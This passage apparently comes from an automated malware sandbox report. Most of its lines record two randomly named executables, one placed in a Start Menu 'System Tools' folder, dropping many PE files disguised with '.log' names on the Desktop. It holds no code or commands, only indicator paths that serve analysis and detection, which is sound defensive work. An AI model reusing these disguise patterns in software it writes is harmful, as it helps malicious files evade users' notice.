                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\dKlIuyLO.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\WKjpqzTc.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\IgGVBfqZ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\nYXzmwFp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\LEvStJys.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\VOpRirdG.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\NEWCTUxq.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\VDLborKV.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\CYcTTrrX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\UmOidmEa.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\YwaKaovT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\fUOHmcKi.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\sgXWGXfk.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\eWPiaGig.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\jFHPguuZ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\oZZOlFlp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\WLQZDrsB.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\DAfcAdjS.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\WgxIpVoy.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\lzFWljSG.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\vpCPqhyF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\KMbLIKLR.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\hMsguyJb.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\qHVggSrJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\IQXUcfJd.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\WiesDNNX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\MmOLMqmx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\otZOJrJN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\baJGltgV.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\IzyaiCCJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\JapvNPbx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\EzoTkVXm.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZaghFjTO.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\dQWYMfTH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\eTYoXqRT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\eeFyxBcE.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\HPmLzFXY.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\AefMODTq.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\DswJWuJN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\FxxLTNKF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\hssgXLlC.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\xxZNeyLt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\eHNQPyaJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\pwZqNBtQ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\jGqnAmhH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\zaBVcLCP.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\GrWSIakL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\yHtdVhrW.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\xATktOEY.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\NQgmULbr.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\SlzRxYMl.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\zmLFdDgP.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\HgsdOaRa.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\pvrGzKVr.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\BpxnzmkL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\vrvmFyrk.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\kGyWBgAx.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\SWHRKmQg.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\kDcZKjpC.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\FFhdxwlL.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\MjzskGoA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\YjjrLEtu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\DXOleQyG.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\GGiDqFDB.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\EVCmjrsI.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\MbPZGXOu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\HJAvhXOf.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\AQotzTRR.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\YuMryEyW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\JvdSwEFX.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\AVHMeQAt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\NImBSGpT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\naQWCNyV.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\iKNqYmED.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\DDuvcNgQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\luCemuwv.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\rGeXPKfd.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\JQrKHwDu.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\GOTKaosQ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\VZbjtNtA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ZpcBYfHT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\aZMqfwUo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\sKHPBBwF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\fPQYZyug.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\sFKgoXgD.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\FUptAQNB.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\toafQXzH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\LNSSdwSp.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\yERXsZaS.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\FFnbpIFd.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ccSQbSYJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\VlDkhNyc.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\zYgEJQlz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\hAixtGfa.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\LESjjfMz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\CYbeNrdN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\OLsbOcto.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\jLOQRvWt.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\WlXaMeru.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\CUHLiuul.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\BSjUAQPo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\JRYtVobT.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\NEXrZULz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\WUhawSrf.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\YbtaoKyW.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\BGEGNIeN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\shEGUPEJ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\BVbCJhtL.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\LfVByPYY.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\KFIMcleA.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\cKWbBtXG.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\XfGAYNcS.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\TvubsmQz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\XRIjRSGa.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\adhyQtRa.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\eTWARqDK.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\VtGsqNSz.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\TJILxrgf.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\BmiVXCnN.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\fpYOnkHi.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\vNbglcZZ.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\SiSqReIq.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\wWhDskZv.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\kxbWRuhA.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\sMBlRSok.logJump to dropped file
                            Source: C:\Users\user\Desktop\teh76E2k50.exeDropped PE file which has not been started: C:\Users\user\Desktop\ofivtIHo.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\ByUnjZDH.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\RlvripyF.logJump to dropped file
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeDropped PE file which has not been started: C:\Users\user\Desktop\BQYWEsJr.logJump to dropped file
